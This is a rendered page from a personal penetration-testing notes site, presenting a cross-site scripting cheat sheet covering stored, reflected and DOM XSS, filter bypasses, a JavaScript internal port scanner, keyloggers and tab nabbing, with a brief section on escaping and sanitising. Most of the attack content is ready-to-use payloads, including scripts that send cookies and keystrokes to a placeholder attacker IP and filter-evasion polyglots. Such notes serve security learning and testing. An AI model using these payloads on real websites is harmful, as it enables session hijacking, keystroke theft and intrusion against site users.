stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/exploit/web/xss.html

438 lines
57 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<!-- mathjax -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>In the Open</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">In the Open</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#cross-site-scripting">Cross-Site Scripting</a><ul>
<li><a href="#stored-xss">Stored XSS</a><ul>
<li><a href="#examples">Examples</a></li>
</ul>
</li>
<li><a href="#reflected-xss">Reflected XSS</a><ul>
<li><a href="#usage">Usage</a></li>
</ul>
</li>
<li><a href="#dom-based-xss">DOM based XSS</a><ul>
<li><a href="#usage_1">Usage</a></li>
</ul>
</li>
<li><a href="#bypass-filters">Bypass Filters</a></li>
<li><a href="#portscanner-via-javascript">Portscanner via Javascript</a></li>
<li><a href="#keylogger">Keylogger</a></li>
<li><a href="#tab-nabbing">Tab Nabbing</a></li>
<li><a href="#tricks-and-tips">Tricks and Tips</a></li>
<li><a href="#protection-methods">Protection Methods</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="cross-site-scripting">Cross-Site Scripting</h1>
<p>A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.</p>
<h2 id="stored-xss">Stored XSS</h2>
<p>This is where a malicious string originates from the websites database. Such as (stored in a db)
* User profiles
* Chats and comments
* Part of link</p>
<ul>
<li>Blind xss is stored inside the app but effects are only visible by proxy, <a href="https://xsshunter.com/">xsshunter</a>.</li>
</ul>
<h3 id="examples">Examples</h3>
<ul>
<li>Sanity test by changing DOM content</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nt">&lt;script&gt;</span>document.getElementById(&#39;myIdName&#39;).innerHTML=&quot;napf&quot;<span class="nt">&lt;/script&gt;</span>
</code></pre></div>
<ul>
<li>Cookie stealing</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;/log/&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Navigte to `/logs` and take sid
</code></pre></div>
<ul>
<li>Open nc port and collect cookies</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://&lt;attacker-IP&gt;:&lt;attacker-Port&gt;/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
<span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="kd">var</span><span class="w"> </span><span class="nx">i</span><span class="o">=</span><span class="ow">new</span><span class="w"> </span><span class="nx">Image</span><span class="p">;</span><span class="nx">i</span><span class="p">.</span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;http://&lt;attacker-IP&gt;:&lt;attacker-Port&gt;/?&quot;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>
<h2 id="reflected-xss">Reflected XSS</h2>
<p>In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
* URL parameters inside GET queries
* File paths</p>
<h3 id="usage">Usage</h3>
<p>As script inside parameter</p>
<div class="codehilite"><pre><span></span><code>http://example.com/search?keyword<span class="o">=</span>&lt;script&gt;...&lt;/script&gt;
</code></pre></div>
<ul>
<li>Show server IP</li>
</ul>
<div class="codehilite"><pre><span></span><code>http://example.com/reflected?keyword=<span class="nt">&lt;script&gt;</span>alert(window.location.hostname)<span class="nt">&lt;/script&gt;</span>
</code></pre></div>
<ul>
<li>Session stealing, base64 encoded</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;http://&lt;attacker-IP&gt;/steal?cookie=&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">btoa</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">));</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* open netcat binder to catch the http queries
</code></pre></div>
<h2 id="dom-based-xss">DOM based XSS</h2>
<p>With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">var</span><span class="w"> </span><span class="nx">keyword</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="s1">&#39;#search&#39;</span><span class="p">)</span><span class="w"></span>
<span class="nx">keyword</span><span class="p">.</span><span class="nx">innerHTML</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="p">...</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>
<h3 id="usage_1">Usage</h3>
<ul>
<li>Find the sub-object inside the document</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nx">test</span><span class="s2">&quot; onmouseover=&quot;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;YO!&#39;</span><span class="p">)</span><span class="err">&quot;</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Show cookie</li>
</ul>
<div class="codehilite"><pre><span></span><code>test&quot; onmouseover=&quot;alert(document.cookie)&quot;
</code></pre></div>
<h2 id="bypass-filters">Bypass Filters</h2>
<ul>
<li><code>&lt;script&gt;</code> sanitizing</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(&#39;Hello&#39;);</span><span class="p">&gt;</span>
</code></pre></div>
<p>or </p>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;&lt;</span><span class="err">/script&gt;script&gt;alert(&quot;1&quot;);&lt;&lt;/script&gt;/script&gt;</span><span class="w"></span>
</code></pre></div>
<ul>
<li><code>alert()</code> sanitizing</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="mf">0</span><span class="err">\</span><span class="s2">&quot;autofocus/onfocus=alert(1)--&gt;&lt;onerror=prompt(2)&gt;&quot;</span><span class="o">-</span><span class="nx">confirm</span><span class="p">(</span><span class="mf">3</span><span class="p">)</span><span class="o">-</span><span class="err">&quot;</span><span class="w"></span>
</code></pre></div>
<p>or</p>
<div class="codehilite"><pre><span></span><code><span class="mf">0</span><span class="err">\</span><span class="s2">&quot;autofocus/onfocus=alert(1)--&gt;&lt;video/poster/onerror=prompt(2)&gt;&quot;</span><span class="o">-</span><span class="nx">confirm</span><span class="p">(</span><span class="mf">3</span><span class="p">)</span><span class="o">-</span><span class="err">&quot;</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Strings, here its <code>Hello</code></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">style</span><span class="o">&gt;</span><span class="err">@</span><span class="nx">keyframes</span><span class="w"> </span><span class="nx">slidein</span><span class="w"> </span><span class="p">{}</span><span class="o">&lt;</span><span class="err">/style&gt;&lt;xss style=&quot;animation-duration:1s;animation-name:slidein;animation-iteration-count:2&quot; onanimationiteration=&quot;alert(&#39;Hello&#39;)&quot;&gt;&lt;/xss&gt;</span><span class="w"></span>
</code></pre></div>
<h2 id="portscanner-via-javascript">Portscanner via Javascript</h2>
<ul>
<li>By requesting the favicon, checking port 80</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="w"> </span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="w"></span>
<span class="w"></span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kd">let</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">0</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="mf">256</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"></span><span class="kd">let</span><span class="w"> </span><span class="nx">ip</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;192.168.0.&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">i</span><span class="w"></span>
<span class="w"></span><span class="kd">let</span><span class="w"> </span><span class="nx">code</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;&lt;img src=&quot;http://&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">ip</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">&#39;/favicon.ico&quot; onload=&quot;this.onerror=null; this.src=/log/&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">ip</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">&#39;&quot;&gt;&#39;</span><span class="w"></span>
<span class="w"></span><span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="nx">code</span><span class="w"></span>
<span class="w"></span><span class="p">}</span><span class="w"></span>
<span class="o">&lt;</span><span class="err">/script&gt; </span><span class="w"></span>
</code></pre></div>
<ul>
<li><a href="https://www.gnucitizen.org/files/2006/08/jsportscanner.js">pdp's portscanner</a></li>
</ul>
<h2 id="keylogger">Keylogger</h2>
<div class="codehilite"><pre><span></span><code><span class="w"> </span><span class="o">&lt;</span><span class="nx">script</span><span class="w"> </span><span class="nx">type</span><span class="o">=</span><span class="s2">&quot;text/javascript&quot;</span><span class="o">&gt;</span><span class="w"></span>
<span class="w"></span><span class="kd">let</span><span class="w"> </span><span class="nx">l</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">;</span><span class="w"> </span><span class="c1">// Variable to store key-strokes in</span><span class="w"></span>
<span class="w"></span><span class="nb">document</span><span class="p">.</span><span class="nx">onkeypress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="p">(</span><span class="nx">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Event to listen for key presses</span><span class="w"></span>
<span class="w"></span><span class="nx">l</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="nx">e</span><span class="p">.</span><span class="nx">key</span><span class="p">;</span><span class="w"> </span><span class="c1">// If user types, log it to the l variable</span><span class="w"></span>
<span class="w"></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">l</span><span class="p">);</span><span class="w"> </span><span class="c1">// update this line to post to your own server</span><span class="w"></span>
<span class="w"></span><span class="p">}</span><span class="w"></span>
<span class="o">&lt;</span><span class="err">/script&gt; </span><span class="w"></span>
</code></pre></div>
<ul>
<li>base64 encoded keylogger</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="w"></span>
<span class="nb">document</span><span class="p">.</span><span class="nx">onkeypress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="p">(</span><span class="nx">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;http://&lt;attacker-IP&gt;/log?key=&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">btoa</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">key</span><span class="p">)</span><span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>
<h2 id="tab-nabbing">Tab Nabbing</h2>
<ul>
<li>Redirection of source after opening a tab through a provisioned link and back referencing </li>
<li><a href="https://book.hacktricks.xyz/pentesting-web/reverse-tab-nabbing">Hacktricks Tabnabbing</a></li>
</ul>
<h2 id="tricks-and-tips">Tricks and Tips</h2>
<ul>
<li>Use Polyglots</li>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html">XSS Filter Evasion Cheat Sheet</a></li>
<li>Close the a vulnerable, exploitable tag and open a script tag</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;/</span><span class="nt">tag</span><span class="p">&gt;&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">);&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<h2 id="protection-methods">Protection Methods</h2>
<p>There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.</p>
<ol>
<li>
<p>Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the &lt; and &gt; characters from being rendered.</p>
</li>
<li>
<p>Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.</p>
</li>
<li>
<p>Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the &lt; character into the HTML entity &#60;</p>
</li>
</ol>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
function linkClick(obj) {
if (obj.open) {
console.log('open');
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
} else {
console.log('closed');
sessionStorage.removeItem(obj.id);
}
// if (obj.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", obj.id);
// console.log(obj);
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
}
//if ( sessionStorage.getItem("opened")) {
// var item = sessionStorage.getItem("opened")
// document.getElementById(item)['open'] = 'open';
//}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
// const detailsElement = document.querySelector('.details-sidebar');
// detailsElement.addEventListener('toggle', event => {
// if (event.target.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", detailsElement.id);
// console.log(detailsElement);
//
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
// });
//
// async function fetchIndexJSON() {
// const response = await fetch('/index.json');
// const index = await response.json();
// return index;
// }
// // Extract the `q` query parameter
//var queryStringRegex = /[\?&]q=([^&]+)/g;
//var matches = queryStringRegex.exec(window.location.search);
//if(matches && matches[1]) {
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
//
//
// // fetchIndexJSON()
// // .then(index => { console.log(index['index']);});
// // Load the posts to search
// fetch('/index').then(function(posts) {
// // Remember to include Fuse.js before this script.
//
// var fuse = new Fuse(posts, {
// keys: ['title', 'tags', 'content'] // What we're searching
// });
//
// // Run the search
// var results = fuse.search(value);
// //console.log(results);
//
// // Generate markup for the posts, implement SearchResults however you want.
// // var $results = SearchResults(results);
//
// // Add the element to the empty <div> from before.
//// $('#searchResults').append($results);
// });
//}
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
</script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>